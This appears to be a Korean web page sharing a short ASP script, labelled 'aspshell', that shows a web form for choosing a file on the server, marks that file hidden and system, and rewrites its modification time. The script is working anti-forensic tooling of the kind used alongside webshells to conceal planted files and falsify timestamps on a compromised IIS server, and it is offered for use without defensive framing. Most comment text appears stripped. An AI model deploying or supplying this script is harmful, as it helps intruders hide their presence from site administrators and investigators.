파일 의 시간 과 속성 을 수정 하 는 ASP 스 크 립 트 숨 기기


<%
' aspshell
' : FSO , , , ;FSO attributes ,1 ,2 ,4
' shell.application
'2009/02/24 write by skyfire
response.write "<form method=post>"
response.write " &nbsp;&nbsp;&nbsp;&nbsp; :<input name=path value='"&server.mappath("/")&"' size='30'>( \ )<br />"
response.write " :<input name=filename value='test.txt' size='30'><br />"
response.write " :<input name=time value='12/30/2099 12:30:30' size='30'><br />"
response.write "<input type=submit value= >"
response.write "</form>"

'
set path=request.Form("path")
set fileName=request.Form("filename")
set newTime=request.Form("time")

if( (len(path)>0)and(len(fileName)>0)and(len(newTime)>0) )then

' fso
Set fso=Server.CreateObject("Scripting.FileSystemObject")
Set file=fso.getFile(path&fileName)
file.attributes=2+4 ' +

' shell.Application
Set shell=Server.CreateObject("Shell.Application")
Set app_path=shell.NameSpace(server.mappath("."))
Set app_file=app_path.ParseName(fileName)
app_file.Modifydate=newTime

end if
%>

좋은 웹페이지 즐겨찾기